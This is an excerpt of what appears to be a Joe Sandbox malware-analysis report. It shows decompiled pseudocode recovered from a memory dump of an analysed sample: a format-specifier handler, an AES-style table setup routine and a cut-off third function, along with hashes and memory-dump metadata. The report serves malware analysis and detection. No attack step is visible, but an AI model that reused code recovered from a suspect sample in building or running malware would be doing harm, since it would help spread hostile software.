							__eflags =  *_t168 -  *((intOrPtr*)(_t170 + 0x84)) - 5;
							if( *_t168 <=  *((intOrPtr*)(_t170 + 0x84)) - 5) {
								goto L19;
							}
							_t94 = E00BB476B(_t170);
							__eflags = _t94;
							if(_t94 == 0) {
								goto L48;
							}
							goto L19;
							L45:
							__eflags = _t165 - 0x1ae;
						} while (_t165 < 0x1ae);
						L46:
						 *((char*)(_t170 + 0xe662)) = 1;
						__eflags =  *((char*)(_t168 + 8));
						if( *((char*)(_t168 + 8)) != 0) {
							L49:
							_t115 =  *((intOrPtr*)(_t171 + 0x1e8));
							_push(0x132);
							_push(_t115);
							_push(_t171 + 0x2c);
							E00BB2FE6();
							_push(0x40);
							_push(_t115 + 0xeec);
							_push(_t171 + 0x166);
							E00BB2FE6();
							_push(0x10);
							_push(_t115 + 0x1dd8);
							_push(_t171 + 0x1a6);
							E00BB2FE6();
							_push(0x2c);
							_push(_t115 + 0x2cc4);
							_push(_t171 + 0x1b6);
							E00BB2FE6();
							_t90 = 1;
							goto L50;
						}
						__eflags =  *_t168 -  *((intOrPtr*)(_t170 + 0x84));
						if( *_t168 <=  *((intOrPtr*)(_t170 + 0x84))) {
							goto L49;
						}
						goto L48;
					}
					__eflags =  *_t168 -  *((intOrPtr*)(__ecx + 0x84)) - 0x19;
					if( *_t168 <=  *((intOrPtr*)(__ecx + 0x84)) - 0x19) {
						goto L5;
					}
					_t90 = E00BB476B(__ecx);
					__eflags = _t90;
					if(_t90 == 0) {
						goto L51;
					}
					goto L5;
				}
				return 1;
			}

0x00bb3cec
0x00bb3cee
0x00bb3cf8
0x00bb3cff
0x00bb3d03
0x00bb3d1f
0x00bb3d20
0x00bb3d20
0x00bb3d23
0x00bb3d31
0x00bb3d34
0x00bb3d39
0x00bb3d3c
0x00bb3d75
0x00000000
0x00bb3d75
0x00bb3d4c
0x00bb3d4f
0x00bb3d54
0x00bb3d56
0x00bb3d5f
0x00bb3d5f
0x00bb3d62
0x00bb3d62
0x00bb3d63
0x00bb3d66
0x00000000
0x00000000
0x00bb3d68
0x00bb3d6d
0x00bb3d6e
0x00bb3d70
0x00000000
0x00000000
0x00000000
0x00bb3d70
0x00bb3d72
0x00000000
0x00bb3d72
0x00bb3d58
0x00bb3d79
0x00bb3d79
0x00bb3d7a
0x00bb3d7a
0x00bb3d8a
0x00bb3d8c
0x00bb3d94
0x00bb3d95
0x00bb3d96
0x00bb3d9a
0x00bb3d9f
0x00bb3d9f
0x00bb3da1
0x00bb3da1
0x00bb3da5
0x00bb3dc3
0x00bb3dc5
0x00bb3dcc
0x00bb3dd2
0x00bb3dd8
0x00bb3ddc
0x00bb3e09
0x00bb3e0a
0x00bb3e0b
0x00bb3e0f
0x00bb3e11
0x00bb3e2c
0x00bb3e2f
0x00bb3e3b
0x00bb3e3d
0x00bb3e41
0x00bb3e46
0x00bb3e52
0x00bb3e54
0x00bb3e56
0x00bb3e58
0x00bb3e58
0x00bb3e5a
0x00bb3e62
0x00bb3e62
0x00bb3e65
0x00bb3e71
0x00bb3e73
0x00bb3e76
0x00bb3ec0
0x00bb3edd
0x00bb3edd
0x00bb3ee0
0x00bb3ec2
0x00bb3ecc
0x00bb3ecf
0x00bb3ecf
0x00bb3ee4
0x00bb3ee9
0x00bb3ee9
0x00bb3eea
0x00bb3ef0
0x00000000
0x00000000
0x00bb3ef2
0x00bb3ef7
0x00bb3ef8
0x00bb3efa
0x00000000
0x00000000
0x00bb3efc
0x00bb3efc
0x00000000
0x00bb3efc
0x00000000
0x00bb3ee9
0x00bb3e78
0x00bb3e7b
0x00bb3e98
0x00bb3e98
0x00bb3e9b
0x00bb3e7d
0x00bb3e87
0x00bb3e8a
0x00bb3e8a
0x00bb3e9f
0x00bb3ea4
0x00bb3ea6
0x00bb3f23
0x00bb3f23
0x00bb3f8a
0x00bb3f8c
0x00000000
0x00bb3ea8
0x00bb3ea8
0x00bb3ea8
0x00bb3ea9
0x00bb3eaf
0x00000000
0x00000000
0x00bb3eb5
0x00bb3eb9
0x00bb3eba
0x00bb3ebc
0x00000000
0x00000000
0x00000000
0x00bb3ebe
0x00000000
0x00bb3ea8
0x00bb3ea6
0x00bb3e67
0x00bb3e6b
0x00000000
0x00bb3e6b
0x00bb3e16
0x00bb3e19
0x00bb3e19
0x00bb3e1b
0x00000000
0x00000000
0x00bb3e1d
0x00bb3e1e
0x00bb3e21
0x00bb3e24
0x00000000
0x00000000
0x00000000
0x00bb3e26
0x00bb3e28
0x00000000
0x00bb3e28
0x00bb3de0
0x00bb3de3
0x00bb3ded
0x00bb3df5
0x00bb3dfa
0x00bb3dfd
0x00000000
0x00bb3dfd
0x00bb3db0
0x00bb3db2
0x00000000
0x00000000
0x00bb3db6
0x00bb3dbb
0x00bb3dbd
0x00000000
0x00000000
0x00000000
0x00bb3f00
0x00bb3f00
0x00bb3f00
0x00bb3f0c
0x00bb3f0c
0x00bb3f13
0x00bb3f17
0x00bb3f27
0x00bb3f27
0x00bb3f32
0x00bb3f37
0x00bb3f38
0x00bb3f3b
0x00bb3f40
0x00bb3f4a
0x00bb3f52
0x00bb3f53
0x00bb3f58
0x00bb3f62
0x00bb3f6a
0x00bb3f6b
0x00bb3f70
0x00bb3f78
0x00bb3f80
0x00bb3f83
0x00bb3f88
0x00000000
0x00bb3f88
0x00bb3f1b
0x00bb3f21
0x00000000
0x00000000
0x00000000
0x00bb3f21
0x00bb3d0e
0x00bb3d10
0x00000000
0x00000000
0x00bb3d12
0x00bb3d17
0x00bb3d19
0x00000000
0x00000000
0x00000000
0x00bb3d19
0x00000000

Memory Dump Source

Source File: 00000000.00000002.438183335.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000000.00000002.438179507.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438305520.0000000000BD2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438317024.0000000000BDD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438342561.0000000000BE3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438351002.0000000000C00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438356952.0000000000C01000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438370351.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438380720.0000000000C21000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ba0000_2rVBokoc2C.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3a18d49064e165be0d32872db8d66ea11280a91596ba4a1cde63f58a8bde047c
Instruction ID: a930607b9b24d51d2f7e0482874688de88fca06ba9a342e9ff2fdf6f353ec14c
Opcode Fuzzy Hash: 3a18d49064e165be0d32872db8d66ea11280a91596ba4a1cde63f58a8bde047c
Instruction Fuzzy Hash: E5710A717087459BDB24DF68C8D0BFE76E1EB91704F0009ADE5868B182DBB4DA85C761

Uniqueness

Uniqueness Score: -1.00%

Function 00BC457A Relevance: .2, Instructions: 214
COMMONLIBRARYCODECrypto

Download Yara Rule

C-Code - Quality: 88%

			E00BC457A(void* __ecx) {
				char _v6;
				char _v8;
				void* __ebx;
				void* __edi;
				void* __esi;
				char _t49;
				signed int _t50;
				void* _t51;
				signed char _t54;
				signed char _t56;
				signed int _t57;
				signed int _t58;
				signed char _t67;
				signed char _t69;
				signed char _t71;
				signed char _t80;
				signed char _t82;
				signed int _t84;
				signed int _t86;
				signed int _t87;
				signed char _t92;
				void* _t95;
				intOrPtr _t100;
				unsigned int _t102;
				signed char _t104;
				void* _t112;
				unsigned int _t113;
				void* _t114;
				signed int _t115;
				signed int* _t116;
				void* _t119;
				void* _t121;
				void* _t122;
				void* _t124;
				void* _t125;

				_push(__ecx);
				_t119 = __ecx;
				_t92 = 1;
				_t49 =  *((char*)(__ecx + 0x31));
				_t124 = _t49 - 0x64;
				if(_t124 > 0) {
					__eflags = _t49 - 0x70;
					if(__eflags > 0) {
						_t50 = _t49 - 0x73;
						__eflags = _t50;
						if(_t50 == 0) {
							L9:
							_t51 = E00BC5168(_t119);
							L10:
							if(_t51 != 0) {
								__eflags =  *((char*)(_t119 + 0x30));
								if( *((char*)(_t119 + 0x30)) == 0) {
									_t113 =  *(_t119 + 0x20);
									_push(_t114);
									_v8 = 0;
									_t115 = 0;
									_v6 = 0;
									_t54 = _t113 >> 4;
									__eflags = _t92 & _t54;
									if((_t92 & _t54) == 0) {
										L46:
										_t100 =  *((intOrPtr*)(_t119 + 0x31));
										__eflags = _t100 - 0x78;
										if(_t100 == 0x78) {
											L48:
											_t56 = _t113 >> 5;
											__eflags = _t92 & _t56;
											if((_t92 & _t56) != 0) {
												L50:
												__eflags = _t100 - 0x61;
												if(_t100 == 0x61) {
													L53:
													_t57 = 1;
													L54:
													__eflags = _t92;
													if(_t92 != 0) {
														L56:
														 *((char*)(_t121 + _t115 - 4)) = 0x30;
														__eflags = _t100 - 0x58;
														if(_t100 == 0x58) {
															L59:
															_t58 = 1;
															L60:
															__eflags = _t58;
															 *((char*)(_t121 + _t115 - 3)) = ((_t58 & 0xffffff00 | _t58 == 0x00000000) - 0x00000001 & 0x000000e0) + 0x78;
															_t115 = _t115 + 2;
															__eflags = _t115;
															L61:
															_t95 =  *((intOrPtr*)(_t119 + 0x24)) -  *((intOrPtr*)(_t119 + 0x38)) - _t115;
															__eflags = _t113 & 0x0000000c;
															if((_t113 & 0x0000000c) == 0) {
																E00BC3A44(_t119 + 0x448, 0x20, _t95, _t119 + 0x18);
																_t122 = _t122 + 0x10;
															}
															E00BC5463(_t119 + 0x448,  &_v8, _t115, _t119 + 0x18,  *((intOrPtr*)(_t119 + 0xc)));
															_t102 =  *(_t119 + 0x20);
															_t116 = _t119 + 0x18;
															_t67 = _t102 >> 3;
															__eflags = _t67 & 0x00000001;
															if((_t67 & 0x00000001) != 0) {
																_t104 = _t102 >> 2;
																__eflags = _t104 & 0x00000001;
																if((_t104 & 0x00000001) == 0) {
																	E00BC3A44(_t119 + 0x448, 0x30, _t95, _t116);
																	_t122 = _t122 + 0x10;
																}
															}
															E00BC5331(_t95, _t119, _t116, _t119, 0);
															__eflags =  *_t116;
															if( *_t116 >= 0) {
																_t71 =  *(_t119 + 0x20) >> 2;
																__eflags = _t71 & 0x00000001;
																if((_t71 & 0x00000001) != 0) {
																	E00BC3A44(_t119 + 0x448, 0x20, _t95, _t116);
																}
															}
															_t69 = 1;
															L70:
															return _t69;
														}
														__eflags = _t100 - 0x41;
														if(_t100 == 0x41) {
															goto L59;
														}
														_t58 = 0;
														goto L60;
													}
													__eflags = _t57;
													if(_t57 == 0) {
														goto L61;
													}
													goto L56;
												}
												__eflags = _t100 - 0x41;
												if(_t100 == 0x41) {
													goto L53;
												}
												_t57 = 0;
												goto L54;
											}
											L49:
											_t92 = 0;
											__eflags = 0;
											goto L50;
										}
										__eflags = _t100 - 0x58;
										if(_t100 != 0x58) {
											goto L49;
										}
										goto L48;
									}
									_t80 = _t113 >> 6;
									__eflags = _t92 & _t80;
									if((_t92 & _t80) == 0) {
										__eflags = _t92 & _t113;
										if((_t92 & _t113) == 0) {
											_t82 = _t113 >> 1;
											__eflags = _t92 & _t82;
											if((_t92 & _t82) == 0) {
												goto L46;
											}
											_v8 = 0x20;
											L45:
											_t115 = _t92;
											goto L46;
										}
										_v8 = 0x2b;
										goto L45;
									}
									_v8 = 0x2d;
									goto L45;
								}
								_t69 = _t92;
								goto L70;
							}
							L11:
							_t69 = 0;
							goto L70;
						}
						_t84 = _t50;
						__eflags = _t84;
						if(__eflags == 0) {
							L28:
							_push(0);
							_push(0xa);
							L29:
							_t51 = E00BC4F73(_t119, _t114, __eflags);
							goto L10;
						}
						__eflags = _t84 - 3;
						if(__eflags != 0) {
							goto L11;
						}
						_push(0);
						L13:
						_push(0x10);
						goto L29;
					}
					if(__eflags == 0) {
						_t51 = E00BC5150(__ecx);
						goto L10;
					}
					__eflags = _t49 - 0x67;
					if(_t49 <= 0x67) {
						L30:
						_t51 = E00BC4B7F(_t92, _t119);
						goto L10;
					}
					__eflags = _t49 - 0x69;
					if(_t49 == 0x69) {
						L27:
						_t2 = _t119 + 0x20;
						 *_t2 =  *(_t119 + 0x20) | 0x00000010;
						__eflags =  *_t2;
						goto L28;
					}
					__eflags = _t49 - 0x6e;
					if(_t49 == 0x6e) {
						_t51 = E00BC50BD(__ecx, _t112);
						goto L10;
					}
					__eflags = _t49 - 0x6f;
					if(_t49 != 0x6f) {
						goto L11;
					}
					_t51 = E00BC5131(__ecx);
					goto L10;
				}
				if(_t124 == 0) {
					goto L27;
				}
				_t125 = _t49 - 0x58;
				if(_t125 > 0) {
					_t86 = _t49 - 0x5a;
					__eflags = _t86;
					if(_t86 == 0) {
						_t51 = E00BC4AB9(__ecx);
						goto L10;
					}
					_t87 = _t86 - 7;
					__eflags = _t87;
					if(_t87 == 0) {
						goto L30;
					}
					__eflags = _t87;
					if(__eflags != 0) {
						goto L11;
					}
					L17:
					_t51 = E00BC4E4B(_t92, _t119, __eflags, 0);
					goto L10;
				}
				if(_t125 == 0) {
					_push(1);
					goto L13;
				}
				if(_t49 == 0x41) {
					goto L30;
				}
				if(_t49 == 0x43) {
					goto L17;
				}
				if(_t49 <= 0x44) {
					goto L11;
				}
				if(_t49 <= 0x47) {
					goto L30;
				}
				if(_t49 != 0x53) {
					goto L11;
				}
				goto L9;
			}

0x00bc457f
0x00bc4582
0x00bc4586
0x00bc4589
0x00bc458d
0x00bc4590
0x00bc45fe
0x00bc4601
0x00bc4650
0x00bc4650
0x00bc4653
0x00bc45c0
0x00bc45c2
0x00bc45c7
0x00bc45c9
0x00bc466e
0x00bc4672
0x00bc467b
0x00bc4680
0x00bc4681
0x00bc4685
0x00bc4687
0x00bc468c
0x00bc468f
0x00bc4691
0x00bc46ba
0x00bc46ba
0x00bc46bd
0x00bc46c0
0x00bc46c7
0x00bc46c9
0x00bc46cc
0x00bc46ce
0x00bc46d2
0x00bc46d2
0x00bc46d5
0x00bc46e0
0x00bc46e0
0x00bc46e2
0x00bc46e2
0x00bc46e4
0x00bc46ea
0x00bc46ea
0x00bc46ef
0x00bc46f2
0x00bc46fd
0x00bc46fd
0x00bc46ff
0x00bc46ff
0x00bc470a
0x00bc470e
0x00bc470e
0x00bc4711
0x00bc4717
0x00bc4719
0x00bc471c
0x00bc472c
0x00bc4731
0x00bc4731
0x00bc4746
0x00bc474b
0x00bc474e
0x00bc4753
0x00bc4756
0x00bc4758
0x00bc475a
0x00bc475d
0x00bc4760
0x00bc476d
0x00bc4772
0x00bc4772
0x00bc4760
0x00bc4779
0x00bc477e
0x00bc4781
0x00bc4786
0x00bc4789
0x00bc478b
0x00bc4798
0x00bc479d
0x00bc478b
0x00bc47a0
0x00bc47a3
0x00bc47a8
0x00bc47a8
0x00bc46f4
0x00bc46f7
0x00000000
0x00000000
0x00bc46f9
0x00000000
0x00bc46f9
0x00bc46e6
0x00bc46e8
0x00000000
0x00000000
0x00000000
0x00bc46e8
0x00bc46d7
0x00bc46da
0x00000000
0x00000000
0x00bc46dc
0x00000000
0x00bc46dc
0x00bc46d0
0x00bc46d0
0x00bc46d0
0x00000000
0x00bc46d0
0x00bc46c2
0x00bc46c5
0x00000000
0x00000000
0x00000000
0x00bc46c5
0x00bc4695
0x00bc4698
0x00bc469a
0x00bc46a2
0x00bc46a4
0x00bc46ae
0x00bc46b0
0x00bc46b2
0x00000000
0x00000000
0x00bc46b4
0x00bc46b8
0x00bc46b8
0x00000000
0x00bc46b8
0x00bc46a6
0x00000000
0x00bc46a6
0x00bc469c
0x00000000
0x00bc469c
0x00bc4674
0x00000000
0x00bc4674
0x00bc45cf
0x00bc45cf
0x00000000
0x00bc45cf
0x00bc465a
0x00bc465a
0x00bc465d
0x00bc462f
0x00bc462f
0x00bc4630
0x00bc4632
0x00bc4634
0x00000000
0x00bc4634
0x00bc465f
0x00bc4662
0x00000000
0x00000000
0x00bc4668
0x00bc45d7
0x00bc45d7
0x00000000
0x00bc45d7
0x00bc4603
0x00bc4646
0x00000000
0x00bc4646
0x00bc4605
0x00bc4608
0x00bc463b
0x00bc463d
0x00000000
0x00bc463d
0x00bc460a
0x00bc460d
0x00bc462b
0x00bc462b
0x00bc462b
0x00bc462b
0x00000000
0x00bc462b
0x00bc460f
0x00bc4612
0x00bc4624
0x00000000
0x00bc4624
0x00bc4614
0x00bc4617
0x00000000
0x00000000
0x00bc461b
0x00000000
0x00bc461b
0x00bc4592
0x00000000
0x00000000
0x00bc4598
0x00bc459b
0x00bc45db
0x00bc45db
0x00bc45de
0x00bc45f7
0x00000000
0x00bc45f7
0x00bc45e0
0x00bc45e0
0x00bc45e3
0x00000000
0x00000000
0x00bc45e6
0x00bc45e9
0x00000000
0x00000000
0x00bc45eb
0x00bc45ee
0x00000000
0x00bc45ee
0x00bc459d
0x00bc45d6
0x00000000
0x00bc45d6
0x00bc45a2
0x00000000
0x00000000
0x00bc45ab
0x00000000
0x00000000
0x00bc45b0
0x00000000
0x00000000
0x00bc45b5
0x00000000
0x00000000
0x00bc45be
0x00000000
0x00000000
0x00000000

Memory Dump Source

Source File: 00000000.00000002.438183335.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000000.00000002.438179507.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438305520.0000000000BD2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438317024.0000000000BDD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438342561.0000000000BE3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438351002.0000000000C00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438356952.0000000000C01000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438370351.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438380720.0000000000C21000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ba0000_2rVBokoc2C.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5deea3b29f66a918188f7a75532971316276c2599c24e1ebb0fa75850081f94e
Instruction ID: 32830fa70e5ca15cf9573a5008e3c0347542d4b43b563899bdf1f4c8d388f0f8
Opcode Fuzzy Hash: 5deea3b29f66a918188f7a75532971316276c2599c24e1ebb0fa75850081f94e
Instruction Fuzzy Hash: EA516471600A455BDB388A6885B6FBF77D9DB23700F1809EEE8C2CB686C715EF458352

Uniqueness

Uniqueness Score: -1.00%

Function 00BADDAC Relevance: .2, Instructions: 190
COMMONCrypto

Download Yara Rule

C-Code - Quality: 97%

			E00BADDAC() {
				intOrPtr _v8;
				char _v521;
				char _t140;
				signed int _t154;
				signed int _t155;
				signed int _t159;
				signed int _t160;
				signed int _t161;
				signed int _t162;
				signed int _t179;
				signed int _t181;
				signed char _t192;
				signed int _t199;
				signed int _t207;
				void* _t208;
				signed int _t209;
				signed char _t211;
				signed int _t219;
				void* _t220;

				_t140 = 0;
				_t179 = 1;
				_t207 = 1;
				do {
					 *(_t220 + _t140 - 0x304) = _t207;
					 *(_t220 + _t140 - 0x205) = _t207;
					 *((char*)(_t220 + _t207 - 0x104)) = _t140;
					_v8 = _t140 + 1;
					asm("sbb ecx, ecx");
					_t140 = _v8;
					_t207 = _t207 ^  ~(_t207 & 0x80) & 0x0000011b ^ _t207 + _t207;
				} while (_t207 != 1);
				_t208 = 0;
				do {
					 *(_t208 + 0xbe41a0) = _t179;
					asm("sbb ecx, ecx");
					_t179 = _t179 + _t179 ^  ~(_t179 & 0x80) & 0x0000011b;
					_t208 = _t208 + 1;
				} while (_t208 < 0x1e);
				_t181 = 0;
				do {
					if(_t181 == 0) {
						_t209 = 0;
					} else {
						_t209 =  *( &_v521 - ( *(_t220 + (_t181 & 0x000000ff) - 0x104) & 0x000000ff)) & 0x000000ff;
					}
					_t192 = (_t209 ^ (((_t209 + _t209 ^ _t209) + (_t209 + _t209 ^ _t209) ^ _t209) + ((_t209 + _t209 ^ _t209) + (_t209 + _t209 ^ _t209) ^ _t209) ^ _t209) + (((_t209 + _t209 ^ _t209) + (_t209 + _t209 ^ _t209) ^ _t209) + ((_t209 + _t209 ^ _t209) + (_t209 + _t209 ^ _t209) ^ _t209) ^ _t209) ^ 0x00006300) >> 0x00000008 ^ _t209 ^ (((_t209 + _t209 ^ _t209) + (_t209 + _t209 ^ _t209) ^ _t209) + ((_t209 + _t209 ^ _t209) + (_t209 + _t209 ^ _t209) ^ _t209) ^ _t209) + (((_t209 + _t209 ^ _t209) + (_t209 + _t209 ^ _t209) ^ _t209) + ((_t209 + _t209 ^ _t209) + (_t209 + _t209 ^ _t209) ^ _t209) ^ _t209);
					 *(_t181 + 0xbe3fa0) = _t192;
					 *(0xbe4dc1 + _t181 * 4) = _t192;
					 *(0xbe4dc0 + _t181 * 4) = _t192;
					 *(0xbe49c3 + _t181 * 4) = _t192;
					 *(0xbe49c0 + _t181 * 4) = _t192;
					 *(0xbe45c3 + _t181 * 4) = _t192;
					 *(0xbe45c2 + _t181 * 4) = _t192;
					 *(0xbe41c2 + _t181 * 4) = _t192;
					 *(0xbe41c1 + _t181 * 4) = _t192;
					if(_t192 == 0) {
						_t154 = 0;
					} else {
						_t154 =  *(_t220 + ( *(_t220 + (_t192 & 0x000000ff) - 0x104) & 0x000000ff) - 0x2eb) & 0x000000ff;
					}
					 *(0xbe4dc3 + _t181 * 4) = _t154;
					 *(0xbe49c2 + _t181 * 4) = _t154;
					 *(0xbe45c1 + _t181 * 4) = _t154;
					 *(0xbe41c0 + _t181 * 4) = _t154;
					if(_t192 == 0) {
						_t155 = 0;
					} else {
						_t155 =  *(_t220 + ( *(_t220 + (_t192 & 0x000000ff) - 0x104) & 0x000000ff) - 0x303) & 0x000000ff;
					}
					_t219 = _t181 & 0x000000ff;
					 *(0xbe4dc2 + _t181 * 4) = _t155;
					 *(0xbe49c1 + _t181 * 4) = _t155;
					 *(0xbe45c0 + _t181 * 4) = _t155;
					 *(0xbe41c3 + _t181 * 4) = _t155;
					if((((_t219 << 0x00000003 ^ _t219) << 0x00000002 ^ _t219) + ((_t219 << 0x00000003 ^ _t219) << 0x00000002 ^ _t219) >> 0x00000008 ^ ((_t219 << 0x00000003 ^ _t219) << 0x00000002 ^ _t219) + ((_t219 << 0x00000003 ^ _t219) << 0x00000002 ^ _t219)) == 5) {
						_t211 = 0;
					} else {
						_t211 =  *((intOrPtr*)( &_v521 - ( *(_t220 + (((_t219 << 0x00000003 ^ _t219) << 0x00000002 ^ _t219) + ((_t219 << 0x00000003 ^ _t219) << 0x00000002 ^ _t219) >> 0x00000008 & 0x000000ff ^ ((_t219 << 0x00000003 ^ _t219) << 0x00000002 ^ _t219) + ((_t219 << 0x00000003 ^ _t219) << 0x00000002 ^ _t219) & 0x000000ff ^ 0x00000005) - 0x104) & 0x000000ff)));
					}
					 *(_t181 + 0xbe40a0) = _t211;
					if(_t211 == 0) {
						_t159 = 0;
					} else {
						_t159 =  *(_t220 + ( *(_t220 + (_t211 & 0x000000ff) - 0x104) & 0x000000ff) - 0x29c) & 0x000000ff;
					}
					_t199 = _t211 & 0x000000ff;
					 *(0xbe5dc2 + _t181 * 4) = _t159;
					 *(0xbe59c1 + _t181 * 4) = _t159;
					 *(0xbe55c0 + _t181 * 4) = _t159;
					 *(0xbe51c3 + _t181 * 4) = _t159;
					 *(0xbe6dc2 + _t199 * 4) = _t159;
					 *(0xbe69c1 + _t199 * 4) = _t159;
					 *(0xbe65c0 + _t199 * 4) = _t159;
					 *(0xbe61c3 + _t199 * 4) = _t159;
					if(_t211 == 0) {
						_t160 = 0;
					} else {
						_t160 =  *(_t220 + ( *(_t220 + _t199 - 0x104) & 0x000000ff) - 0x23d) & 0x000000ff;
					}
					 *(0xbe5dc0 + _t181 * 4) = _t160;
					 *(0xbe59c3 + _t181 * 4) = _t160;
					 *(0xbe55c2 + _t181 * 4) = _t160;
					 *(0xbe51c1 + _t181 * 4) = _t160;
					 *(0xbe6dc0 + _t199 * 4) = _t160;
					 *(0xbe69c3 + _t199 * 4) = _t160;
					 *(0xbe65c2 + _t199 * 4) = _t160;
					 *(0xbe61c1 + _t199 * 4) = _t160;
					if(_t211 == 0) {
						_t161 = 0;
					} else {
						_t161 =  *(_t220 + ( *(_t220 + _t199 - 0x104) & 0x000000ff) - 0x216) & 0x000000ff;
					}
					 *(0xbe5dc1 + _t181 * 4) = _t161;
					 *(0xbe59c0 + _t181 * 4) = _t161;
					 *(0xbe55c3 + _t181 * 4) = _t161;
					 *(0xbe51c2 + _t181 * 4) = _t161;
					 *(0xbe6dc1 + _t199 * 4) = _t161;
					 *(0xbe69c0 + _t199 * 4) = _t161;
					 *(0xbe65c3 + _t199 * 4) = _t161;
					 *(0xbe61c2 + _t199 * 4) = _t161;
					if(_t211 == 0) {
						_t162 = 0;
					} else {
						_t162 =  *(_t220 + ( *(_t220 + _t199 - 0x104) & 0x000000ff) - 0x225) & 0x000000ff;
					}
					 *(0xbe5dc3 + _t181 * 4) = _t162;
					 *(0xbe59c2 + _t181 * 4) = _t162;
					 *(0xbe55c1 + _t181 * 4) = _t162;
					 *(0xbe51c0 + _t181 * 4) = _t162;
					_t181 = _t181 + 1;
					 *(0xbe6dc3 + _t199 * 4) = _t162;
					 *(0xbe69c2 + _t199 * 4) = _t162;
					 *(0xbe65c1 + _t199 * 4) = _t162;
					 *(0xbe61c0 + _t199 * 4) = _t162;
				} while (_t181 < 0x100);
				return _t162;
			}

0x00baddb5
0x00baddba
0x00baddbc
0x00baddc3
0x00baddc3
0x00baddca
0x00baddd1
0x00baddd9
0x00badde8
0x00baddee
0x00baddf1
0x00baddf3
0x00baddf7
0x00baddf9
0x00baddfb
0x00bade08
0x00bade0e
0x00bade10
0x00bade11
0x00bade16
0x00bade18
0x00bade1a
0x00bade34
0x00bade1c
0x00bade2f
0x00bade2f
0x00bade52
0x00bade54
0x00bade5a
0x00bade61
0x00bade68
0x00bade6f
0x00bade76
0x00bade7d
0x00bade84
0x00bade8b
0x00bade94
0x00badeab
0x00bade96
0x00badea1
0x00badea1
0x00badead
0x00badeb4
0x00badebb
0x00badec2
0x00badecb
0x00badee2
0x00badecd
0x00baded8
0x00baded8
0x00badee4
0x00badee9
0x00badef5
0x00badf01
0x00badf0a
0x00badf1a
0x00badf4e
0x00badf1c
0x00badf4a
0x00badf4a
0x00badf50
0x00badf58
0x00badf6f
0x00badf5a
0x00badf65
0x00badf65
0x00badf71
0x00badf74
0x00badf7b
0x00badf82
0x00badf89
0x00badf90
0x00badf97
0x00badf9e
0x00badfa5
0x00badfae
0x00badfc2
0x00badfb0
0x00badfb8
0x00badfb8
0x00badfc4
0x00badfcb
0x00badfd2
0x00badfd9
0x00badfe0
0x00badfe7
0x00badfee
0x00badff5
0x00badffe
0x00bae012
0x00bae000
0x00bae008
0x00bae008
0x00bae014
0x00bae01b
0x00bae022
0x00bae029
0x00bae030
0x00bae037
0x00bae03e
0x00bae045
0x00bae04e
0x00bae062
0x00bae050
0x00bae058
0x00bae058
0x00bae064
0x00bae06b
0x00bae072
0x00bae079
0x00bae080
0x00bae081
0x00bae088
0x00bae08f
0x00bae096
0x00bae09d
0x00bae0ae

Memory Dump Source

Source File: 00000000.00000002.438183335.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000000.00000002.438179507.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438305520.0000000000BD2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438317024.0000000000BDD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438342561.0000000000BE3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438351002.0000000000C00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438356952.0000000000C01000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438370351.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438380720.0000000000C21000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ba0000_2rVBokoc2C.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fb9f8b769eef3d9412100826df5a8c99f397b185f504e569555404638b156a9a
Instruction ID: 46c9ffafe6cf783f4732e6bc2f52412bf2a11392839d5bc9dd6090e3cca43b71
Opcode Fuzzy Hash: fb9f8b769eef3d9412100826df5a8c99f397b185f504e569555404638b156a9a
Instruction Fuzzy Hash: 47816D812192D49ECB1A8F7D38E42F63FE15773240F1945FAC4C68B6A3D93A4A5CD722

Uniqueness

Uniqueness Score: -1.00%

Function 00BAE7E0 Relevance: .2, Instructions: 154
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E00BAE7E0(signed char __ecx, char _a4) {
				char _v12;
				signed int _v13;
				signed int _v14;
				signed int _v15;
				signed int _v16;
				signed char _v17;
				signed char _v18;
				signed char _v19;
				signed char _v20;
				char _v28;
				signed int _v29;
				signed int _v30;
				signed int _v31;
				signed int _v32;
				signed int _v36;
				signed char _v40;
				signed char _t96;
				signed int _t117;
				signed int* _t121;
				signed int* _t122;
				void* _t124;
				signed int _t125;
				signed int _t126;
